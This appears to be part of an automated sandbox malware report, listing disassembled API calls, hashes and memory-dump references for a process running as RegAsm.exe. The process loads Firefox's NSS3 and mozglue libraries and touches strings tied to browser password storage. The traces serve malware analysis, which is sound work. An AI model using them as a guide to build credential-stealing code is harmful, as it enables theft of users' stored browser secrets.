                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,000003E8,00000000), ref: 6C95B357
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C95B3A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: htonlmemcpy$ErrorUtil$Item_$AllocAlloc_Unothrow_t@std@@@ValueZfree__ehfuncinfo$??2@memsetrealloc
                                                                                • String ID:
                                                                                • API String ID: 1535029029-0
                                                                                • Opcode ID: 8e267412c95dc824bffafc9bcfbb939a103535881f0978dee04f0d1b8bea3af6
                                                                                • Instruction ID: 40b7b90d75d1ebe2bf13e769f6a1352dd182e380492d4942a82943e2da7d246c
                                                                                • Opcode Fuzzy Hash: 8e267412c95dc824bffafc9bcfbb939a103535881f0978dee04f0d1b8bea3af6
                                                                                • Instruction Fuzzy Hash: D0B1C7B1A053006BF711DB358C81FAB72BDAF2470CF840929FE5596A82F775D5288692
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C973046
                                                                                  • Part of subcall function 6C95EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C947FFB), ref: 6C97312A
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C973154
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C972E8B
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                  • Part of subcall function 6C95F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C949BFF,?,00000000,00000000), ref: 6C95F134
                                                                                • memcpy.VCRUNTIME140(8B3C75C0,?,6C947FFA), ref: 6C972EA4
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C97317B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Error$memcpy$K11_Value
                                                                                • String ID:
                                                                                • API String ID: 2334702667-0
                                                                                • Opcode ID: 31da218d2e51ed971091d82426eaa75b2fab0c4ce734c2c9834881566a16d312
                                                                                • Instruction ID: deda1f4b36e3f8cd1a306bd5dc912c06bdcf49d0edb8247335dcf189909f5207
                                                                                • Opcode Fuzzy Hash: 31da218d2e51ed971091d82426eaa75b2fab0c4ce734c2c9834881566a16d312
                                                                                • Instruction Fuzzy Hash: B7A1AC71A002189FDB24CF54CC84BEAB7B5EF59308F048199E94967741E731EE95CFA1
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C93ED6B
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6C93EDCE
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • free.MOZGLUE(00000000,?,?,?,?,6C93B04F), ref: 6C93EE46
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C93EECA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C93EEEA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C93EEFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 3768380896-0
                                                                                • Opcode ID: d193e7c15e59e1551d657ef5d10254cb2b0396754e297d761518b7c8a69e8ab9
                                                                                • Instruction ID: 147a0832559e66e1dfb8ffde1d689ec056f1e25d157225468b9ea3da407064fa
                                                                                • Opcode Fuzzy Hash: d193e7c15e59e1551d657ef5d10254cb2b0396754e297d761518b7c8a69e8ab9
                                                                                • Instruction Fuzzy Hash: E0816EB5A002159FEB24CF55DD80BAB7BF9BF49308F144428E8299B791D735EC14CBA1
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C8114C5
                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8114E2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C811546
                                                                                • InitializeConditionVariable.KERNEL32(?), ref: 6C8115BA
                                                                                • free.MOZGLUE(?), ref: 6C8116B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                • String ID:
                                                                                • API String ID: 1909280232-0
                                                                                • Opcode ID: cf3e1488ff1228741c4a523ce57def95565b7feacef671cb495adeb977c7ce01
                                                                                • Instruction ID: 11e624ef38ec0d2cdc96f9839556013429ff258492db87d1670b5360b1e2e35a
                                                                                • Opcode Fuzzy Hash: cf3e1488ff1228741c4a523ce57def95565b7feacef671cb495adeb977c7ce01
                                                                                • Instruction Fuzzy Hash: 4661E072A047159BDB318F24C984BDAB7B4BF99308F44892CED8A57B01DB35E948CBD1
                                                                                APIs
                                                                                  • Part of subcall function 6C93C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C93DAE2,?), ref: 6C93C6C2
                                                                                • PR_Now.NSS3 ref: 6C93CD35
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                  • Part of subcall function 6C926C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C3F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C93CD54
                                                                                  • Part of subcall function 6C999BF0: TlsGetValue.KERNEL32(?,?,?,6C9E0A75), ref: 6C999C07
                                                                                  • Part of subcall function 6C927260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1CCC,00000000,00000000,?,?), ref: 6C92729F
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93CD9B
                                                                                • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C93CE0B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C93CE2C
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C93CE40
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaMark_Util.NSS3(?,6C93CD93,?), ref: 6C93CEEE
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C93CD93,?), ref: 6C93CEFC
                                                                                  • Part of subcall function 6C93CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C93CD93,?), ref: 6C93CF0B
                                                                                  • Part of subcall function 6C93CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C93CD93,?), ref: 6C93CF1D
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF47
                                                                                  • Part of subcall function 6C93CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF67
                                                                                  • Part of subcall function 6C93CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C93CD93,?,?,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF78
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 3748922049-0
                                                                                • Opcode ID: d569066e4c1d0b7386ae602ae2a737f8323b344762bfa18383243802d0fc6b51
                                                                                • Instruction ID: fe0bfef95d9e800688d78388269d90fa5d1876dd8b1d569495e402ad20eca260
                                                                                • Opcode Fuzzy Hash: d569066e4c1d0b7386ae602ae2a737f8323b344762bfa18383243802d0fc6b51
                                                                                • Instruction Fuzzy Hash: EB51D576A006309FE720EF69DC40B9A73E8AF68348F255624D85D9B790EB31ED05CB91
                                                                                APIs
                                                                                • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C90EF38
                                                                                  • Part of subcall function 6C8F9520: PK11_IsLoggedIn.NSS3(00000000,?,6C92379E,?,00000001,?), ref: 6C8F9542
                                                                                • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C90EF53
                                                                                  • Part of subcall function 6C914C20: TlsGetValue.KERNEL32 ref: 6C914C4C
                                                                                  • Part of subcall function 6C914C20: EnterCriticalSection.KERNEL32(?), ref: 6C914C60
                                                                                  • Part of subcall function 6C914C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CA1
                                                                                  • Part of subcall function 6C914C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C914CBE
                                                                                  • Part of subcall function 6C914C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CD2
                                                                                  • Part of subcall function 6C914C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D3A
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C90EF9E
                                                                                  • Part of subcall function 6C999BF0: TlsGetValue.KERNEL32(?,?,?,6C9E0A75), ref: 6C999C07
                                                                                • free.MOZGLUE(00000000), ref: 6C90EFC3
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C90F016
                                                                                • free.MOZGLUE(00000000), ref: 6C90F022
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                • String ID:
                                                                                • API String ID: 2459274275-0
                                                                                • Opcode ID: d6b85ab24d84076fcdc5e96c36b14bb76f317112268e196e8e2628a1a274fb16
                                                                                • Instruction ID: 0a190ff7bbc3cf8f9edd046901805bd49e384f4dae789159535a62c07afa6461
                                                                                • Opcode Fuzzy Hash: d6b85ab24d84076fcdc5e96c36b14bb76f317112268e196e8e2628a1a274fb16
                                                                                • Instruction Fuzzy Hash: FB4183B1E0020AAFDF018FA9DC45BEF7BB9AF58358F044029F914A7350E775C9158BA5
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C8D2D1A), ref: 6C8E2E7E
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C8D8298,?,?,?,6C8CFCE5,?), ref: 6C9307BF
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9307E6
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C93081B
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C930825
                                                                                • PR_Now.NSS3 ref: 6C8E2EDF
                                                                                • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C8E2EE9
                                                                                • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C8D2D1A), ref: 6C8E2F01
                                                                                • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C8D2D1A), ref: 6C8E2F50
                                                                                • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C8E2F81
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                • String ID:
                                                                                • API String ID: 287051776-0
                                                                                • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                • Instruction ID: 3e410ebe6c296ce1330a70e4e40433a376a1a66f5719d68df76008bab46c8b0f
                                                                                • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                • Instruction Fuzzy Hash: 2A3157715011478BF730C619DD8CBAF7265EF8A318F240E79D02E97AD0EB38D886C611
                                                                                APIs
                                                                                • CERT_DecodeAVAValue.NSS3(?,?,6C8D0A2C), ref: 6C8D0E0F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C8D0A2C), ref: 6C8D0E73
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C8D0A2C), ref: 6C8D0E85
                                                                                • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C8D0A2C), ref: 6C8D0E90
                                                                                • free.MOZGLUE(00000000), ref: 6C8D0EC4
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C8D0A2C), ref: 6C8D0ED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                • String ID:
                                                                                • API String ID: 3618544408-0
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0041AC05
                                                                                  • Part of subcall function 004195E3: __mtinitlocknum.LIBCMT ref: 004195F9
                                                                                  • Part of subcall function 004195E3: __amsg_exit.LIBCMT ref: 00419605
                                                                                  • Part of subcall function 004195E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142,?,?,0041824B,00000000,0042C9F8,00418292,?), ref: 0041960D
                                                                                • DecodePointer.KERNEL32(0042C980,00000020,0041AD48,00000000,00000001,00000000,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D), ref: 0041AC41
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC52
                                                                                  • Part of subcall function 0041A1CA: EncodePointer.KERNEL32(00000000,0041DD9C,00640400,00000314,00000000,?,?,?,?,?,0041AF5F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A1CC
                                                                                • DecodePointer.KERNEL32(-00000004,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC78
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC8B
                                                                                • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC95
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2005412495-0
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8DAEB3
                                                                                • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C8DAECA
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8DAEDD
                                                                                • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C8DAF02
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C9F9500), ref: 6C8DAF23
                                                                                  • Part of subcall function 6C92F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C92F0C8
                                                                                  • Part of subcall function 6C92F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C92F122
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8DAF37
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                • String ID:
                                                                                • API String ID: 3714604333-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                • realloc.MOZGLUE(DA5D7AA7,?), ref: 6C95EEAE
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C95EEC5
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • htonl.WSOCK32(?), ref: 6C95EEE3
                                                                                • htonl.WSOCK32(00000000,?), ref: 6C95EEED
                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C95EF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                • String ID:
                                                                                • API String ID: 1351805024-0
                                                                                APIs
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C90EE49
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C90EE5C
                                                                                • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C90EE77
                                                                                • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C90EE9D
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C90EEB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                • String ID:
                                                                                • API String ID: 886189093-0
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 004199DC
                                                                                  • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                  • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                • __amsg_exit.LIBCMT ref: 004199FC
                                                                                • __lock.LIBCMT ref: 00419A0C
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00419A29
                                                                                • _free.LIBCMT ref: 00419A3C
                                                                                • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00419A54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                APIs
                                                                                • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC5
                                                                                • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EDE
                                                                                • lstrlenA.KERNEL32(00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EF0
                                                                                • wsprintfA.USER32 ref: 00410F02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                • String ID: %s%s$C:\Users\user\Desktop\
                                                                                • API String ID: 1206339513-438050915
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8BAFDA
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C8BAFD3
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8BAFC4
                                                                                • unable to delete/modify collation sequence due to active statements, xrefs: 6C8BAF5C
                                                                                • misuse, xrefs: 6C8BAFCE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004063B6
                                                                                • memcmp.MSVCRT ref: 004063DC
                                                                                • memset.MSVCRT ref: 0040640B
                                                                                • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                • String ID: v10
                                                                                APIs
                                                                                • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C7EF480
                                                                                  • Part of subcall function 6C7BF100: LoadLibraryW.KERNEL32(shell32,?,6C82D020), ref: 6C7BF122
                                                                                  • Part of subcall function 6C7BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7BF132
                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C7EF555
